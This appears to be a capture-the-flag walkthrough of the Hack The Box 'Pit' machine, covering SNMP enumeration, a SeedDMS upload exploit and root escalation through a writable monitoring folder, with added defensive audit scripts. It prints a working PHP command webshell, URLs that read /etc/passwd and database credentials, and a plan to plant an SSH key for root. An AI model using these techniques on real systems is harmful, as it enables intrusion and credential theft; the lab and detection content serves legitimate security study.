
Hack The Box – Pit Walkthrough

Introduction

This was an intermediate Linux machine that required enumerating SNMP to find and exploit a vulnerable SeedDMS instance for initial access, and then exploiting a misconfigured Bash script to elevate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions

The scan has identified three open ports: port 22 (SSH), port 80 (HTTP) and port 9090 (HTTP).

When performing a UDP scan using the -sU flag, SNMP is also found:

The next step will be to start enumerating HTTP and SNMP.

Enumerating HTTP

The following page is displayed when accessing the site hosted on port 80:

Whereas the CentOS web login page is displayed on port 9090:

System credentials are normally used to authenticate to this panel, so it isn’t particularly useful at the moment.

When inspecting the certificate used for the site, a “dms-pit.htb” domain is revealed:

Adding the entry to the /etc/hosts file:

Unfortunately, navigating to it returns a 403 error:

Enumerating SNMP

Enumerating all SNMP object identifiers using SNMPWalk:

snmpwalk -v2c -c public 10.10.10.241 .1

An interesting entry pointing at /var/www/html/seeddms51x/seeddms can be found:

When accessing the dms-pit.htb domain and adding /seeddms51x/seeddms/ to the URL, SeedDMS, a document management system based on PHP, can be accessed:

There is also an entry pointing to /usr/bin/monitor, which isn’t a usual binary:

The SNMP section of HackTricks recommends installing SNMP MIBS Downloader to see what the various SNMP object identifiers are, and using SNMPWalk with the NET-SNMP-EXTEND-MIB::nsExtendOutputFull query to enumerate the target system further:

https://book.hacktricks.xyz/pentesting/pentesting-snmp

Installing the tool:

Using the command mentioned above to find out more information about the system:

snmpwalk -v 1 -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendOutputFull

This has revealed an unusual “michelle” user. Authenticating to SeedDMS as this user with a password of “michelle” grants access to the site:
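Seen from the host side, the SNMP findings above come down to two snmpd.conf settings: a guessable community string with no source or view restriction, and an extend entry whose program and output are reachable by anyone who can query the agent. The audit below is an added example, not part of the original walkthrough; the sample configuration, the extend name and the second community string are constructed for illustration.

```shell
#!/bin/sh
# Constructed snmpd.conf resembling the exposure in this walkthrough.
# The extend name "monitoring" and the second community are made up.
sample_conf() {
cat <<'EOF'
# constructed sample
rocommunity public
rocommunity m0n1t0r-ro 10.0.0.5 .1.3.6.1.2.1.1
extend monitoring /usr/bin/monitor
EOF
}

# audit_snmpd_conf: read snmpd.conf on stdin, print one finding per line,
# exit status 1 when anything was flagged.
audit_snmpd_conf() {
    awk '
        { sub(/#.*/, "") }          # drop comments
        NF == 0 { next }
        # rocommunity|rwcommunity NAME [SOURCE [OID | -V VIEW]]
        $1 ~ /^r[ow]community6?$/ {
            if ($2 == "public" || $2 == "private") {
                print "WEAK_COMMUNITY line " NR ": " $2; n++
            }
            if (NF < 4 || $3 == "default") {
                print "UNRESTRICTED line " NR ": no source or OID/view limit"; n++
            }
        }
        # extend [MIBOID] NAME PROG [ARGS]: snmpd runs PROG when the OID is read
        $1 == "extend" {
            prog = ($2 ~ /^\.?[0-9]+(\.[0-9]+)+$/) ? $4 : $3
            print "EXTEND line " NR ": " prog " runs on query"; n++
        }
        END { exit (n > 0) }
    '
}

sample_conf | audit_snmpd_conf || true
```

Every EXTEND finding deserves a follow-up look at what the program reads and executes, since it runs with the privileges of the snmpd process.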

Exploiting SeedDMS Remote Code Execution

When looking for known vulnerabilities affecting SeedDMS, an RCE exploit can be found:

Mirroring the exploit locally:

Remote code execution can be obtained simply by uploading a PHP backdoor and calling it through the /data/1048576/”document_id”/1.php endpoint:

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

Creating the simple PHP remote code execution shell locally:

The Michelle user only had access to their folder, which is under Docs–>Users–>Michelle.

Navigating to the Docs folder:

Navigating to the Users folder:

Navigating to the Michelle folder:

Clicking on the “Add document” button:

Adding a new document, attaching the PHP backdoor:

The document was successfully created:

The id generated for it is 30:

Remote code execution can then be obtained by navigating to it and sending commands in the “cmd” GET parameter:


http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=whoami

After further testing, it appears the target box was not allowed to connect to the local Kali machine, therefore a reverse shell could not be established.
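In the web server's access log, this step shows up as a direct request for a script file under the SeedDMS data directory. The detection below is an added example, not part of the original walkthrough; it assumes combined log format, and the log lines and client addresses are constructed.

```shell
#!/bin/sh
# Constructed access-log lines in combined log format (documentation IPs).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [01/Jun/2021:10:00:01 +0000] "GET /seeddms51x/seeddms/out/out.ViewFolder.php?folderid=8 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jun/2021:10:02:13 +0000] "POST /seeddms51x/seeddms/op/op.AddDocument.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jun/2021:10:02:40 +0000] "GET /seeddms51x/data/1048576/30/1.php?cmd=whoami HTTP/1.1" 200 31 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jun/2021:10:05:00 +0000] "GET /seeddms51x/data/1048576/12/1.pdf HTTP/1.1" 403 153 "-" "curl/7.74.0"
198.51.100.7 - - [01/Jun/2021:10:05:09 +0000] "GET /seeddms51x/data/1048576/31/1.PHTML HTTP/1.1" 404 153 "-" "curl/7.74.0"
EOF
}

# find_upload_exec: read an access log on stdin and print
# "SERVED|PROBE ip status path" for each request that targets a script
# stored under data/<n>/<document_id>/. Exit status 1 when any line matched.
find_upload_exec() {
    awk '
        {
            path = tolower($7)   # extension match must ignore case
            if (path ~ "/data/[0-9]+/[0-9]+/[^/?]+[.](php[0-9]?|phtml|phar)([?]|$)") {
                # 2xx means the server answered the request for the stored script
                kind = ($9 ~ /^2/) ? "SERVED" : "PROBE"
                print kind, $1, $9, $7
                n++
            }
        }
        END { exit (n > 0) }
    '
}

sample_log | find_upload_exec || true
```

A SERVED hit means the web server handed an uploaded file to the PHP interpreter, which is the condition to remove: uploaded documents should not be reachable as executable scripts.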

Authenticating to CentOS Web Login

When viewing the SeedDMS documentation, it appears database credentials are stored in conf/settings.xml:
https://thejsdeveloper.wordpress.com/2019/07/31/installation-of-seed-dms/

By using the remote code execution vulnerability exploited above, credentials for the “seeddms” MySQL user can be found:

http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+/var/www/html/seeddms51x/conf/settings.xml

Since the CentOS web login on port 9090 accepts Linux credentials, an attempt to log in as Michelle with the password found above can be made:

This was successful, granting access to the CentOS panel:

The application has a terminal feature which allows interaction with the system through a Bash shell:

Privilege Escalation

When looking at the /usr/bin/monitor entry found earlier through SNMP enumeration, it appears the script executes files called check*sh under /usr/local/monitoring:

It appears that the current user has write access to this folder, so if a malicious script that matches the name mentioned above is created, it should be executed by /usr/bin/monitor.

Generating SSH keys:

Creating a check.sh script in /usr/local/monitoring/ that will add the public key generated above to the authorized keys of the Root user:

Running the following command to walk through SNMP, which will execute the /usr/bin/monitor script:

snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 

Logging in as Root via SSH using the private key generated above:
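The root cause of this escalation is that a privileged script executes whatever matches check*sh in a directory that a non-root account can write to. The check below is an added example, not part of the original walkthrough: it reports ownership, group/other write bits and the presence of ACL entries on such a directory and on the files the glob would pick up. The function names are hypothetical and the demo directory is constructed to stand in for /usr/local/monitoring.

```shell
#!/bin/sh
# check_path PATH UID: print a finding for anything that lets an account other
# than UID change PATH. Reads the mode string from ls, so it needs no getfacl.
check_path() {
    ls -ldn -- "$1" | awk -v p="$1" -v want="$2" '{
        mode = $1
        if ($3 != want)                 print "OWNER " p " uid=" $3
        if (substr(mode, 6, 1) == "w")  print "GROUP_WRITE " p
        if (substr(mode, 9, 1) == "w")  print "OTHER_WRITE " p
        # A trailing + means ACL entries exist beyond the mode bits.
        if (mode ~ /[+]$/)              print "ACL " p " (review with getfacl)"
    }'
}

# audit_glob_dir DIR PATTERN [UID]: check DIR and every file in it that the
# privileged script would pick up with PATTERN. UID defaults to 0 (root).
audit_glob_dir() {
    dir=$1 pattern=$2 uid=${3:-0}
    check_path "$dir" "$uid"
    for f in "$dir"/$pattern; do
        [ -e "$f" ] && check_path "$f" "$uid"
    done
    return 0
}

# Demo on a constructed directory standing in for /usr/local/monitoring.
demo=$(mktemp -d)
chmod 775 "$demo"
: > "$demo/check_disk.sh"; chmod 644 "$demo/check_disk.sh"
audit_glob_dir "$demo" 'check*sh' "$(id -u)"
rm -rf "$demo"
```

On a real host the call would be `audit_glob_dir /usr/local/monitoring 'check*sh'`, and any output line means an account other than root can influence what the root-run script executes.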

Conclusion

This was a really fun machine, as SNMP isn’t a very common protocol when it comes to penetration testing so it was great to see how it can be enumerated to find very sensitive information that can be leveraged for subsequent attacks.